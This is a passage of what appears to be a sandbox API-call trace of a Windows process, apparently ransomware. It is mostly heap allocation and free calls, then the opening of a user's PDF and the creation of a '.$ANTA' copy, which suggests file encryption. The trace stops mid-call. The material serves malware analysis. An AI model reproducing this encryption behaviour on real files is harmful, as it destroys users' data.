[0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb318 [0079.602] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0079.602] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb018 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0079.603] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0079.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0079.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0079.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0079.603] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.603] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0079.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb300 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e93c8 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.604] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.605] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.606] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.606] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0079.606] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0079.606] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.606] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb3a8 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.607] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ko5kmbwijv.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0079.607] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.607] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.607] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.607] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0079.608] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0079.608] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0079.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.608] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d7d0 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d7d0 | out: hHeap=0x1780000) returned 1 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.609] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0079.609] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg")) returned 0x10 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.609] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\Ko5KMbWIjv.pdf.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\ko5kmbwijv.pdf.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, 